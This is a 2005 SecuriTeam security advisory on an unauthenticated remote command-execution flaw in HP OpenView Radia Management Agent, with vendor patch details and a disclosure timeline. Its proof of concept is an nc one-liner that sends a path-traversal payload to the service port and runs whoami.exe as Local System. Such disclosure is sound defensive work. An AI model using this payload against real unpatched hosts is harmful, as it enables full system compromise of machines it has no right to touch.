[NT] HP OpenView Radia Management Agent Command Execution

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

HP OpenView Radia Management Agent Command Execution
------------------------------------------------------------------------

SUMMARY

The <http://www.hp.com> Radia Management Agent is part of HP's OpenView
Radia suite of software. By connecting to the listening TCP port and
sending a crafted packet, an attacker can run arbitrary code on the target
machine.

DETAILS

Vulnerable Systems:
* HP OpenView Radia Management Portal versions 2.x and 1.x running Radia
Management Agent

HP OpenView Radia Management Portal runs as a Windows service (RMA) with
Local System privileges. The RMA service listens on a TCP port that is not
fixed. In the example below, the service was listening on TCP port 1065.

Proof of Concept:
By connecting to the TCP port and sending a crafted packet, it is possible
to traverse out of C:\Program Files\Novadigm (the apparent working
directory) and run any executable that is located on the same logical disk
partition, in this case the C: drive.

C:\>sc queryex rma

SERVICE_NAME: rma
TYPE : 110 WIN32_OWN_PROCESS (interactive)
STATE : 4 RUNNING
(STOPPABLE,
NOT_PAUSABLE,IGNORES_SHUTDOWN))
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PID : 1032
FLAGS :

C:\>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:1065 0.0.0.0:0 LISTENING 1032

bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v
xx.xx.xx.xx 1065

host.domain [xx.xx.xx.xx] 1065 (?) open
nt authority\system

The output from whoami.exe clearly demonstrates that it is possible for a
remote attacker to execute arbitrary system commands with Local System
privileges without authentication.

Vendor Status:
HP has developed a patch to fix the problem. More information can be found
in their security bulletin:
<http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01138>
HPSBMA01138

Disclosure Timeline:
Date of initial advisory: 28 April 2005
Date of full advisory: 28 July 2005

ADDITIONAL INFORMATION

The information has been provided by <mailto:nisr@nextgenss.com>
NGSSoftware Insight Security Research.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.